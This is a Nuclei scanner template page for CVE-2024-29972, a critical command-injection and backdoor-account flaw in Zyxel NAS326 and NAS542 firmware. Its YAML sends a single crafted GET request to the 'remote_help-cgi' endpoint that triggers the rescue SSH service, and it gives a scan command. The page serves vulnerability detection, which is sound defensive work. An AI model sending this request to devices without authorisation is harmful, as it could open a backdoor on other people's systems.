Skip to content
Nuclei Templates

Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account

ID: CVE-2024-29972

Severity: critical

Author: gy741

Tags: cve,cve2024,zyxel,backdoor

Description

Section titled “Description”

The command injection vulnerability in the CGI program “remote_help-cgi” in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.

YAML Source

Section titled “YAML Source”
id: CVE-2024-29972


info:
  name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account
  author: gy741
  severity: critical
  description: |
    The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
  reference:
    - https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29972
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.88
    cve-id: CVE-2024-29972
    cwe-id: CWE-78
    epss-score: 0.9
    epss-percentile: 0.3869
    cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zyxel
    product: nas326_firmware
    fofa-query: app="ZYXEL-NAS326"
  tags: cve,cve2024,zyxel,backdoor


http:
  - raw:
      - |
        GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'result=0')"
        condition: and
# digest: 490a0046304402203bdc148dab5d32f0c9be3c46ebb44c8c0af0bfd93d8a3846a382b3d3dd8ad88c022028f1b94d9ac3574439f6759bfad885e1414eba6e80e8f169b77b52d6c147ac5b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-29972.yaml"

View on Github